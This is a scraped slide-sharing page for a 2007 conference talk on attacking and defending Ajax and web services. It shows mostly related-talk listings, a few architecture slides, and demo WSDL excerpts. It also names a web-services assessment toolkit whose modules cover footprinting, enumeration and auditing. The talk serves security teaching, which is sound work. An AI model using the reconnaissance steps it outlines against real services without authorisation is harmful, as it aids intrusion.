Ajax ppt - 32 slides
Ajax ppt - 32 slidesAjax ppt - 32 slides
Ajax ppt - 32 slidesSmithss25
 
Web Services PHP Tutorial
Web Services PHP TutorialWeb Services PHP Tutorial
Web Services PHP TutorialLorna Mitchell
 
How to make Ajax work for you
How to make Ajax work for youHow to make Ajax work for you
How to make Ajax work for youSimon Willison
 
Testing web services
Testing web servicesTesting web services
Testing web servicesTaras Lytvyn
 
Messaging for IoT
Messaging for IoTMessaging for IoT
Messaging for IoTdejanb
 
Emakina Academy 4 - AJAX, Flash & Rich Internet Applications: harnessing the ...
Emakina Academy 4 - AJAX, Flash & Rich Internet Applications: harnessing the ...Emakina Academy 4 - AJAX, Flash & Rich Internet Applications: harnessing the ...
Emakina Academy 4 - AJAX, Flash & Rich Internet Applications: harnessing the ...Emakina
 
Ataque DNS spoofing con Kali Linux
Ataque DNS spoofing con Kali LinuxAtaque DNS spoofing con Kali Linux
Ataque DNS spoofing con Kali LinuxCarlos Otero
 
RESTful services and OAUTH protocol in IoT
RESTful services and OAUTH protocol in IoTRESTful services and OAUTH protocol in IoT
RESTful services and OAUTH protocol in IoTYakov Fain
 
M2M Protocol Interoperability using IoT Toolkit
M2M Protocol Interoperability using IoT ToolkitM2M Protocol Interoperability using IoT Toolkit
M2M Protocol Interoperability using IoT ToolkitMichael Koster
 
Ajax Introduction Presentation
Ajax   Introduction   PresentationAjax   Introduction   Presentation
Ajax Introduction Presentationthinkphp
 
Iot Toolkit and the Smart Object API - Architecture for Interoperability
Iot Toolkit and the Smart Object API - Architecture for InteroperabilityIot Toolkit and the Smart Object API - Architecture for Interoperability
Iot Toolkit and the Smart Object API - Architecture for InteroperabilityMichael Koster
 
Web Services - A brief overview
Web Services -  A brief overviewWeb Services -  A brief overview
Web Services - A brief overviewRaveendra Bhat
 
An Introduction to Ajax Programming
An Introduction to Ajax ProgrammingAn Introduction to Ajax Programming
An Introduction to Ajax Programminghchen1
 
Web services - A Practical Approach
Web services - A Practical ApproachWeb services - A Practical Approach
Web services - A Practical ApproachMadhaiyan Muthu
 

En vedette (20)

Java Web Services
Java Web ServicesJava Web Services
Java Web Services
 
Java Web Services [4/5]: Java API for XML Web Services
Java Web Services [4/5]: Java API for XML Web ServicesJava Web Services [4/5]: Java API for XML Web Services
Java Web Services [4/5]: Java API for XML Web Services
 
Restful Web Services
Restful Web ServicesRestful Web Services
Restful Web Services
 
Web Services (SOAP, WSDL, UDDI)
Web Services (SOAP, WSDL, UDDI)Web Services (SOAP, WSDL, UDDI)
Web Services (SOAP, WSDL, UDDI)
 
Ajax ppt - 32 slides
Ajax ppt - 32 slidesAjax ppt - 32 slides
Ajax ppt - 32 slides
 
Web Services PHP Tutorial
Web Services PHP TutorialWeb Services PHP Tutorial
Web Services PHP Tutorial
 
How to make Ajax work for you
How to make Ajax work for youHow to make Ajax work for you
How to make Ajax work for you
 
Testing web services
Testing web servicesTesting web services
Testing web services
 
Messaging for IoT
Messaging for IoTMessaging for IoT
Messaging for IoT
 
Messaging for IoT
Messaging for IoTMessaging for IoT
Messaging for IoT
 
Emakina Academy 4 - AJAX, Flash & Rich Internet Applications: harnessing the ...
Emakina Academy 4 - AJAX, Flash & Rich Internet Applications: harnessing the ...Emakina Academy 4 - AJAX, Flash & Rich Internet Applications: harnessing the ...
Emakina Academy 4 - AJAX, Flash & Rich Internet Applications: harnessing the ...
 
Ataque DNS spoofing con Kali Linux
Ataque DNS spoofing con Kali LinuxAtaque DNS spoofing con Kali Linux
Ataque DNS spoofing con Kali Linux
 
RESTful services and OAUTH protocol in IoT
RESTful services and OAUTH protocol in IoTRESTful services and OAUTH protocol in IoT
RESTful services and OAUTH protocol in IoT
 
Protocols for IoT
Protocols for IoTProtocols for IoT
Protocols for IoT
 
M2M Protocol Interoperability using IoT Toolkit
M2M Protocol Interoperability using IoT ToolkitM2M Protocol Interoperability using IoT Toolkit
M2M Protocol Interoperability using IoT Toolkit
 
Ajax Introduction Presentation
Ajax   Introduction   PresentationAjax   Introduction   Presentation
Ajax Introduction Presentation
 
Iot Toolkit and the Smart Object API - Architecture for Interoperability
Iot Toolkit and the Smart Object API - Architecture for InteroperabilityIot Toolkit and the Smart Object API - Architecture for Interoperability
Iot Toolkit and the Smart Object API - Architecture for Interoperability
 
Web Services - A brief overview
Web Services -  A brief overviewWeb Services -  A brief overview
Web Services - A brief overview
 
An Introduction to Ajax Programming
An Introduction to Ajax ProgrammingAn Introduction to Ajax Programming
An Introduction to Ajax Programming
 
Web services - A Practical Approach
Web services - A Practical ApproachWeb services - A Practical Approach
Web services - A Practical Approach
 

Similaire à Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]

Web 2.0 Application Kung-Fu - Securing Ajax & Web Services
Web 2.0 Application Kung-Fu - Securing Ajax & Web ServicesWeb 2.0 Application Kung-Fu - Securing Ajax & Web Services
Web 2.0 Application Kung-Fu - Securing Ajax & Web ServicesShreeraj Shah
 
Shreeraj - Hacking Web 2 0 - ClubHack2007
Shreeraj - Hacking Web 2 0 - ClubHack2007Shreeraj - Hacking Web 2 0 - ClubHack2007
Shreeraj - Hacking Web 2 0 - ClubHack2007ClubHack
 
04. xss and encoding
04.  xss and encoding04.  xss and encoding
04. xss and encodingEoin Keary
 
Shreeraj-Hacking_Web_2
Shreeraj-Hacking_Web_2Shreeraj-Hacking_Web_2
Shreeraj-Hacking_Web_2guest66dc5f
 
AJAX: How to Divert Threats
AJAX:  How to Divert ThreatsAJAX:  How to Divert Threats
AJAX: How to Divert ThreatsCenzic
 
AppSec 2007 - .NET Web Services Hacking
AppSec 2007 - .NET Web Services HackingAppSec 2007 - .NET Web Services Hacking
AppSec 2007 - .NET Web Services HackingShreeraj Shah
 
OWASP Top 10 And Insecure Software Root Causes
OWASP Top 10 And Insecure Software Root CausesOWASP Top 10 And Insecure Software Root Causes
OWASP Top 10 And Insecure Software Root CausesMarco Morana
 
Security in the cloud protecting your cloud apps
Security in the cloud   protecting your cloud appsSecurity in the cloud   protecting your cloud apps
Security in the cloud protecting your cloud appsCenzic
 
Web 2.0 Hacking
Web 2.0 HackingWeb 2.0 Hacking
Web 2.0 Hackingblake101
 
Web Attacks - Top threats - 2010
Web Attacks - Top threats - 2010Web Attacks - Top threats - 2010
Web Attacks - Top threats - 2010Shreeraj Shah
 
Application Security Workshop
Application Security Workshop Application Security Workshop
Application Security Workshop Priyanka Aash
 
A Validation Model of Data Input for Web Services
A Validation Model of Data Input for Web ServicesA Validation Model of Data Input for Web Services
A Validation Model of Data Input for Web ServicesRafael Brinhosa
 
Attackers Vs Programmers
Attackers Vs ProgrammersAttackers Vs Programmers
Attackers Vs Programmersrobin_bene
 
Secure SDLC for Software
Secure SDLC for Software Secure SDLC for Software
Secure SDLC for Software Shreeraj Shah
 
Lessons from the Trenches: Engineering Great AJAX Experiences
Lessons from the Trenches: Engineering Great AJAX ExperiencesLessons from the Trenches: Engineering Great AJAX Experiences
Lessons from the Trenches: Engineering Great AJAX Experiencesgoodfriday
 

Similaire à Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai] (20)

Web 2.0 Application Kung-Fu - Securing Ajax & Web Services
Web 2.0 Application Kung-Fu - Securing Ajax & Web ServicesWeb 2.0 Application Kung-Fu - Securing Ajax & Web Services
Web 2.0 Application Kung-Fu - Securing Ajax & Web Services
 
Shreeraj - Hacking Web 2 0 - ClubHack2007
Shreeraj - Hacking Web 2 0 - ClubHack2007Shreeraj - Hacking Web 2 0 - ClubHack2007
Shreeraj - Hacking Web 2 0 - ClubHack2007
 
04. xss and encoding
04.  xss and encoding04.  xss and encoding
04. xss and encoding
 
Shreeraj-Hacking_Web_2
Shreeraj-Hacking_Web_2Shreeraj-Hacking_Web_2
Shreeraj-Hacking_Web_2
 
AJAX: How to Divert Threats
AJAX:  How to Divert ThreatsAJAX:  How to Divert Threats
AJAX: How to Divert Threats
 
AppSec 2007 - .NET Web Services Hacking
AppSec 2007 - .NET Web Services HackingAppSec 2007 - .NET Web Services Hacking
AppSec 2007 - .NET Web Services Hacking
 
OWASP Top 10 And Insecure Software Root Causes
OWASP Top 10 And Insecure Software Root CausesOWASP Top 10 And Insecure Software Root Causes
OWASP Top 10 And Insecure Software Root Causes
 
Security in the cloud protecting your cloud apps
Security in the cloud   protecting your cloud appsSecurity in the cloud   protecting your cloud apps
Security in the cloud protecting your cloud apps
 
Web 2.0 Hacking
Web 2.0 HackingWeb 2.0 Hacking
Web 2.0 Hacking
 
Web Attacks - Top threats - 2010
Web Attacks - Top threats - 2010Web Attacks - Top threats - 2010
Web Attacks - Top threats - 2010
 
Application Security Workshop
Application Security Workshop Application Security Workshop
Application Security Workshop
 
Security Tech Talk
Security Tech TalkSecurity Tech Talk
Security Tech Talk
 
Ajax Security
Ajax SecurityAjax Security
Ajax Security
 
A Validation Model of Data Input for Web Services
A Validation Model of Data Input for Web ServicesA Validation Model of Data Input for Web Services
A Validation Model of Data Input for Web Services
 
Day8
Day8Day8
Day8
 
Attackers Vs Programmers
Attackers Vs ProgrammersAttackers Vs Programmers
Attackers Vs Programmers
 
Secure SDLC for Software
Secure SDLC for Software Secure SDLC for Software
Secure SDLC for Software
 
Cross site scripting
Cross site scriptingCross site scripting
Cross site scripting
 
WebSec_MSR.ppt
WebSec_MSR.pptWebSec_MSR.ppt
WebSec_MSR.ppt
 
Lessons from the Trenches: Engineering Great AJAX Experiences
Lessons from the Trenches: Engineering Great AJAX ExperiencesLessons from the Trenches: Engineering Great AJAX Experiences
Lessons from the Trenches: Engineering Great AJAX Experiences
 

Plus de Shreeraj Shah

Html5 localstorage attack vectors
Html5 localstorage attack vectorsHtml5 localstorage attack vectors
Html5 localstorage attack vectorsShreeraj Shah
 
XSS and CSRF with HTML5
XSS and CSRF with HTML5XSS and CSRF with HTML5
XSS and CSRF with HTML5Shreeraj Shah
 
FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERY
FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERYFIND ME IF YOU CAN – SMART FUZZING AND DISCOVERY
FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERYShreeraj Shah
 
Top 10 HTML5 Threats - Whitepaper
Top 10 HTML5 Threats - WhitepaperTop 10 HTML5 Threats - Whitepaper
Top 10 HTML5 Threats - WhitepaperShreeraj Shah
 
HTML5 Top 10 Threats - Silent Attacks and Stealth Exploits
HTML5 Top 10 Threats - Silent Attacks and Stealth ExploitsHTML5 Top 10 Threats - Silent Attacks and Stealth Exploits
HTML5 Top 10 Threats - Silent Attacks and Stealth ExploitsShreeraj Shah
 
Blackhat11 shreeraj reverse_engineering_browser
Blackhat11 shreeraj reverse_engineering_browserBlackhat11 shreeraj reverse_engineering_browser
Blackhat11 shreeraj reverse_engineering_browserShreeraj Shah
 
Next Generation Web Attacks – HTML 5, DOM(L3) and XHR(L2)
Next Generation Web Attacks – HTML 5, DOM(L3) and XHR(L2)Next Generation Web Attacks – HTML 5, DOM(L3) and XHR(L2)
Next Generation Web Attacks – HTML 5, DOM(L3) and XHR(L2)Shreeraj Shah
 
Dom Hackking & Security - BlackHat Preso
Dom Hackking & Security - BlackHat PresoDom Hackking & Security - BlackHat Preso
Dom Hackking & Security - BlackHat PresoShreeraj Shah
 
[Infosecworld 08 Orlando] CSRF: The Biggest Little Vulnerability on the Web
[Infosecworld 08 Orlando] CSRF: The Biggest Little Vulnerability on the Web [Infosecworld 08 Orlando] CSRF: The Biggest Little Vulnerability on the Web
[Infosecworld 08 Orlando] CSRF: The Biggest Little Vulnerability on the Web Shreeraj Shah
 
[Infosecworld 08 Orlando] New Defenses for .NET Web Apps: IHttpModule in Prac...
[Infosecworld 08 Orlando] New Defenses for .NET Web Apps: IHttpModule in Prac...[Infosecworld 08 Orlando] New Defenses for .NET Web Apps: IHttpModule in Prac...
[Infosecworld 08 Orlando] New Defenses for .NET Web Apps: IHttpModule in Prac...Shreeraj Shah
 
Hacking Ajax & Web Services - Next Generation Web Attacks on the Rise
Hacking Ajax & Web Services - Next Generation Web Attacks on the RiseHacking Ajax & Web Services - Next Generation Web Attacks on the Rise
Hacking Ajax & Web Services - Next Generation Web Attacks on the RiseShreeraj Shah
 
Hacking and Securing .NET Apps (Infosecworld)
Hacking and Securing .NET Apps (Infosecworld)Hacking and Securing .NET Apps (Infosecworld)
Hacking and Securing .NET Apps (Infosecworld)Shreeraj Shah
 
Web Application Kung-Fu, Art of Defense (Bellua/HITB)
Web Application Kung-Fu, Art of Defense (Bellua/HITB)Web Application Kung-Fu, Art of Defense (Bellua/HITB)
Web Application Kung-Fu, Art of Defense (Bellua/HITB)Shreeraj Shah
 
Web Services Security Chess (RSA)
Web Services Security Chess (RSA)Web Services Security Chess (RSA)
Web Services Security Chess (RSA)Shreeraj Shah
 
Advanced Web Hacking (EUSecWest 06)
Advanced Web Hacking (EUSecWest 06)Advanced Web Hacking (EUSecWest 06)
Advanced Web Hacking (EUSecWest 06)Shreeraj Shah
 
Advanced Web Services Hacking (AusCERT 06)
Advanced Web Services Hacking (AusCERT 06)Advanced Web Services Hacking (AusCERT 06)
Advanced Web Services Hacking (AusCERT 06)Shreeraj Shah
 

Plus de Shreeraj Shah (16)

Html5 localstorage attack vectors
Html5 localstorage attack vectorsHtml5 localstorage attack vectors
Html5 localstorage attack vectors
 
XSS and CSRF with HTML5
XSS and CSRF with HTML5XSS and CSRF with HTML5
XSS and CSRF with HTML5
 
FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERY
FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERYFIND ME IF YOU CAN – SMART FUZZING AND DISCOVERY
FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERY
 
Top 10 HTML5 Threats - Whitepaper
Top 10 HTML5 Threats - WhitepaperTop 10 HTML5 Threats - Whitepaper
Top 10 HTML5 Threats - Whitepaper
 
HTML5 Top 10 Threats - Silent Attacks and Stealth Exploits
HTML5 Top 10 Threats - Silent Attacks and Stealth ExploitsHTML5 Top 10 Threats - Silent Attacks and Stealth Exploits
HTML5 Top 10 Threats - Silent Attacks and Stealth Exploits
 
Blackhat11 shreeraj reverse_engineering_browser
Blackhat11 shreeraj reverse_engineering_browserBlackhat11 shreeraj reverse_engineering_browser
Blackhat11 shreeraj reverse_engineering_browser
 
Next Generation Web Attacks – HTML 5, DOM(L3) and XHR(L2)
Next Generation Web Attacks – HTML 5, DOM(L3) and XHR(L2)Next Generation Web Attacks – HTML 5, DOM(L3) and XHR(L2)
Next Generation Web Attacks – HTML 5, DOM(L3) and XHR(L2)
 
Dom Hackking & Security - BlackHat Preso
Dom Hackking & Security - BlackHat PresoDom Hackking & Security - BlackHat Preso
Dom Hackking & Security - BlackHat Preso
 
[Infosecworld 08 Orlando] CSRF: The Biggest Little Vulnerability on the Web
[Infosecworld 08 Orlando] CSRF: The Biggest Little Vulnerability on the Web [Infosecworld 08 Orlando] CSRF: The Biggest Little Vulnerability on the Web
[Infosecworld 08 Orlando] CSRF: The Biggest Little Vulnerability on the Web
 
[Infosecworld 08 Orlando] New Defenses for .NET Web Apps: IHttpModule in Prac...
[Infosecworld 08 Orlando] New Defenses for .NET Web Apps: IHttpModule in Prac...[Infosecworld 08 Orlando] New Defenses for .NET Web Apps: IHttpModule in Prac...
[Infosecworld 08 Orlando] New Defenses for .NET Web Apps: IHttpModule in Prac...
 
Hacking Ajax & Web Services - Next Generation Web Attacks on the Rise
Hacking Ajax & Web Services - Next Generation Web Attacks on the RiseHacking Ajax & Web Services - Next Generation Web Attacks on the Rise
Hacking Ajax & Web Services - Next Generation Web Attacks on the Rise
 
Hacking and Securing .NET Apps (Infosecworld)
Hacking and Securing .NET Apps (Infosecworld)Hacking and Securing .NET Apps (Infosecworld)
Hacking and Securing .NET Apps (Infosecworld)
 
Web Application Kung-Fu, Art of Defense (Bellua/HITB)
Web Application Kung-Fu, Art of Defense (Bellua/HITB)Web Application Kung-Fu, Art of Defense (Bellua/HITB)
Web Application Kung-Fu, Art of Defense (Bellua/HITB)
 
Web Services Security Chess (RSA)
Web Services Security Chess (RSA)Web Services Security Chess (RSA)
Web Services Security Chess (RSA)
 
Advanced Web Hacking (EUSecWest 06)
Advanced Web Hacking (EUSecWest 06)Advanced Web Hacking (EUSecWest 06)
Advanced Web Hacking (EUSecWest 06)
 
Advanced Web Services Hacking (AusCERT 06)
Advanced Web Services Hacking (AusCERT 06)Advanced Web Services Hacking (AusCERT 06)
Advanced Web Services Hacking (AusCERT 06)
 

Dernier

SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxNavinnSomaal
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Mark Simos
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...Fwdays
 
Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Enterprise Knowledge
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024Stephanie Beckett
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsSergiu Bodiu
 
Story boards and shot lists for my a level piece
Story boards and shot lists for my a level pieceStory boards and shot lists for my a level piece
Story boards and shot lists for my a level piececharlottematthew16
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebUiPathCommunity
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Commit University
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfAddepto
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 3652toLead Limited
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Scott Keck-Warren
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr BaganFwdays
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.Curtis Poe
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brandgvaughan
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxLoriGlavin3
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfAlex Barbosa Coqueiro
 
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Manik S Magar
 

Dernier (20)

SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptx
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
 
Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024
 
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptxE-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platforms
 
Story boards and shot lists for my a level piece
Story boards and shot lists for my a level pieceStory boards and shot lists for my a level piece
Story boards and shot lists for my a level piece
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio Web
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdf
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brand
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdf
 
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!
 

Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]

  • 1. Web 2.0 Hacking Defending Ajax & Web Services Shreeraj Shah Dubai, HITB 2007 5 th April 2007
  • 2.
  • 3.
  • 4.
  • 6.
  • 7.
  • 8.
  • 9.
  • 10. Web 2.0 Architecture HTML / JS / DOM RIA (Flash) Ajax Browser Internet Blog Web 2.0 Start Database Authentication Application Infrastructure Web Services End point Internet Mails News Documents Weather Bank/Trade RSS feeds
  • 11. Ajax Flash / RIA HTML/CSS JavaScript Widget DOM SOAP XML-RPC HTTP/HTTPS JSON XML RSS/ATOM Text JS-Objects Custom SOA/WOA SaaS Web Services Ajax Traditional APIs REST Client Layer Protocol Layer Structure Layer Server Layer Web 2.0 Components
  • 12. Technologies Web Server Static pages HTML,HTM etc.. Web Client Scripted Web Engine Dynamic pages ASP DHTML, PHP,CGI Etc.. DB X ASP.NET with .Net J2EE App Server Web Services Etc.. Application Servers And Integrated Framework Internet DMZ Trusted Internal/Corporate W E B S E R V I C E S Web Service Client SOAP, REST, XML-RPC
  • 13.
  • 14.
  • 15.
  • 16.
  • 17.
  • 18.
  • 19.
  • 20.
  • 21.
  • 22.
  • 23.
  • 24.
  • 25.
  • 26.
  • 27.
  • 28.
  • 29.
  • 30.
  • 31.
  • 32.
  • 33.
  • 34.
  • 35.
  • 36.
  • 37.
  • 38.
  • 39.
  • 40.
  • 41.
  • 42.
  • 43. Transport Stack HTTP, HTTPS Access Stack WSDL,SOAP Discovery Stack UDDI, DISCO Security Stack WS-Security Presentation Stack XML Web services stack
  • 44. Web Services Client HTTP POST SOAP Envelope Web Server 80/443 Web Services Engine Web Services Binaries Web Services Deployment Shell Web Services Code & Components User Controlled Vendor Controlled In Transit End Client Security!
  • 45. Assessment strategies Web Services Risk Model Web Services Defense Controls Blackbox Assessment Whitebox Assessment
  • 46.
  • 47.
  • 48.
  • 49.
  • 50.
  • 51. wsches (Tool) Footprinting Discovery Public domain search Enumeration Manual Audit Auto Audit Defense wsFootprint wsDiscovery wsSearch wsEnum wsProxy wsAudit wsMod wsPawn wsKnight wsRook Download : http://net-square.com/wschess/
  • 52.
  • 53.
  • 54.
  • 55.
  • 56. tModel Structure bindingTemplate Structure businessService Structure businessEntity Structure Find UDDI APIs UDDI Demo
  • 57.
  • 58.
  • 59.
  • 60.
  • 61.
  • 62.
  • 63. Demo Application Web Services Location of WSDL
  • 64.
  • 65.
  • 66.
  • 67.
  • 68.
  • 69. Nodes of WSDL Data types Message Types Operations Access Binding Service
  • 70. WSDL <Service> <service name=&quot;dvds4less&quot;> <port name=&quot;dvds4lessSoap&quot; binding=&quot;s0:dvds4lessSoap&quot;> <soap:address location=&quot;http://192.168.11.2/ws/dvds4less.asmx&quot;/> </port> </service> Where the call is going to hit? It is where service is listening.
  • 71. WSDL <portType> <portType name=&quot;dvds4lessSoap&quot;> <operation name=&quot;Intro&quot;> <input message=&quot;s0:IntroSoapIn&quot;/> <output message=&quot;s0:IntroSoapOut&quot;/> </operation> <operation name=&quot;getProductInfo&quot;> <input message=&quot;s0:getProductInfoSoapIn&quot;/> <output message=&quot;s0:getProductInfoSoapOut&quot;/> </operation> <operation name=&quot;getRebatesInfo&quot;> <input message=&quot;s0:getRebatesInfoSoapIn&quot;/> <output message=&quot;s0:getRebatesInfoSoapOut&quot;/> </operation> </portType> Methods one Can call
  • 72. WSDL <Message> <portType name=&quot;dvds4lessSoap&quot;> <operation name=&quot;getProductInfo&quot;> <input message=&quot;s0:getProductInfoSoapIn&quot;/> <output message=&quot;s0:getProductInfoSoapOut&quot;/> </operation> </portType> <message name=&quot; getProductInfoSoapIn &quot;> <part name=&quot;parameters&quot; element=&quot;s0:getProductInfo&quot;/> </message> <message name=&quot; getProductInfoSoapOut &quot;> <part name=&quot;parameters&quot; element=&quot;s0:getProductInfoResponse&quot;/> </message>
  • 73. WSDL <Types> <s:element name=&quot;getProductInfo&quot;> <s:complexType> <s:sequence> <s:element minOccurs=&quot;0&quot; maxOccurs=&quot;1&quot; name=&quot;id&quot; type=&quot;s:string&quot; /> </s:sequence> </s:complexType> </s:element> <s:element name=&quot;getProductInfoResponse&quot;> <s:complexType> <s:sequence> <s:element minOccurs=&quot;0&quot; maxOccurs=&quot;1&quot; name=&quot;getProductInfoResult&quot; type=&quot;s:string&quot; /> <message name=&quot; getProductInfoSoapIn &quot;> <part name=&quot;parameters&quot; element=&quot;s0:getProductInfo&quot;/> </message> <message name=&quot; getProductInfoSoapOut &quot;> <part name=&quot;parameters&quot; element=&quot;s0:getProductInfoResponse&quot;/> </message>
  • 74. WSDL Profile after Scan Demo String String getRebatesInfo String String getProductInfo String -No- Intro OUTPUT INPUT Methods
  • 75. How it looks? Web Services Code OR Class Intro getProductInfo getRebatesInfo WSDL <PortType> <Service> <Message> <Types> Remote Invokes
  • 76.
  • 77.
  • 78.
  • 79.
  • 80.
  • 81.
